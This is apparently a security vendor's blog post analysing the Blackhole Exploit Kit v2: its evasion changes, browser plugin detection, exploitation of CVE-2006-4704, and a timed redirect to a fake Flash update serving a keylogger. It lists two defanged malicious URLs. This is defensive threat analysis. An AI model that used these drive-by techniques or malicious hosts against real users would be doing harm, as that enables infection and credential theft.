It should come as no surprise that attackers are upgrading their Blackhole exploit kits to a new and more powerful version. An update is now available, thanks to the launch of Blackhole Exploit Kit v2 and we are starting to see adoption of this latest version.
v2 is different than v1 in many ways. Numerous enhancements have been made in order
to ensure that the exploit kit remains undetected in the wild.
Some of key
enhancements include:
- The URL format is dynamic in nature. It does not follow a particular pattern as the version 1.0 URLs did.
- Now executables delivered with malicious content are also protected from multiple downloads.
Heavy obfuscation of the code continues as it had in the prior
version. Like the Blackhole
Exploit Kit v1, v2 also continues to target the known vulnerabilities in
Internet Explorer (IE), Adobe and Java. A sample of raw Blackhole exploit kit
v2 can be seen from the following recent infection:
Exploit Kit URL : hxxp://anygutterking.com/links/assure_numb_engineers.php
If you observe above screen-shots, you will note the highly
obfuscated JavaScript loaded in the browser.
Deobfuscation of the code allows for easier analysis. While
we leverage a proprietary tool built in house for this purpose, you can also
leverage tools like Malzilla and
Jsunpack or attempt to manually deobfuscate
the code.
The deobfuscated code shown below is divided into two parts
for better understanding.
- Browser plugins/components detection
The code shown in the screen-shot is used to detect the different plug-ins and ActiveX components by scanning the DOM of the browser. By identifying the versions of installed plugins/components, the exploit kit can target known vulnerabilities.
- Attacking the vulnerabilities
In this case, a well-known vulnerability (CVE-2006-4704) in the WMI Object Broker in Microsoft Visual Studio 2005 was targeted. For more information about this vulnerability visit read our detailed blog post here. This vulnerability was also targeted by Blackhole v1 and other exploit kits such as the Incognito exploit kit.
At the end of the code, we see a redirect request to “hxxp://o.casasferiasacores.net/adobe/update_flash_player.exe. This is a new addition to the exploit code released in this version. If the victim’s browser is patched and none of the vulnerabilities were exploited, then this redirection still provides one last chance for the attacker to compromise the victim’s machine. The variable “end_redirect” highlighted in above screen-shot is called in function setTimeout. After 60 seconds, the page is redirected to the aforementioned link, which is a fake page to update Adobe Flash. This a typical example of a drive by download attack. Once redirected to this page, the user is prompted to download an .exe file labeled “update_flash_player.exe”
Screen-shot of fake Adobe page hosted on malicious domain,
VirusTotal report
shows that currently only 3/43 AV vendor flag this file as malicious. The ThreatExpert
report for this same file came back as expected. It identified the file with
the highest severity level and analysis indicators show the binary belonging to
the ‘keylogger’ family. The file also connects to the Internet and
downloads additional exe files.
Screen-shot of ThreatExpert
report:
Exploits kits are becoming smarter day by day, which is
keeping security vendors on their toes in an effort to combat new attacks. Fortunately, the cloud infrastructure at Zscaler allows
us the flexibility to quickly add new detections as needed.
With Blackhole Exploit Kit v1, we saw an increase in
malicious domains hosting exploit kits URL’s as the kit matured over the time.
With the latest version being more sophisticated, we are expecting to see an
even more rapid growth of Blackhole Exploit Kit v2.
Pradeep
Posts
No comments:
Post a Comment